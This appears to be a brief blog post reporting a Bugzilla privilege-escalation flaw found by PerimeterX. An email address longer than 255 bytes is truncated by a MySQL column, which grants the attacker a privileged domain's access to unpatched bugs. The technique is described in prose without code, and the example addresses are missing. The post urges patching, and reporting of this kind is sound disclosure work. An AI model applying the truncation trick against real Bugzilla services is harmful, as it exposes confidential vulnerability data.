PerimeterX discovered the vulnerability which “allows an attacker to obtain permissions on a Bugzilla service they would not otherwise receive. This is achieved by tricking the system into believing that the attacker is part of a privileged domain, causing the system to grant domain-specific permissions.”
But what does that mean? Basically someone managed to find a way to access your unpatched bugs – and I believe you agree when I say that that’s not cool. A cybercriminal could use such information for his gain and even open possibilities to infect other people’s computers.
“The Bugzilla authentication mechanism relies on email validation. Prior to the actual registration, the user enters their email address and the system sends an activation link to that address. This link contains a token which allows the user to register using that address and set their real name and their account password.
When the user registers with their email address, it is saved in the tokens DB table, along with the token required to activate the address. The email address is stored in a special column named eventdata.”
By corrupting the email address that is inserted into the database to be longer than 255 bytes the tinytext MySQL DB will truncate it. That basically means that something like this:
Will become something like that:
„The resulting email will be sent to an address which we can read, however when the malicious email address is inserted into the DB it will be truncated, forcing the application to assume we identified an email under a different domain. This essentially performs a privilege-escalation attack, allowing us to obtain privileges we otherwise could not.“
Mozilla has released a patch for the exploit already so make sure that you apply it asap!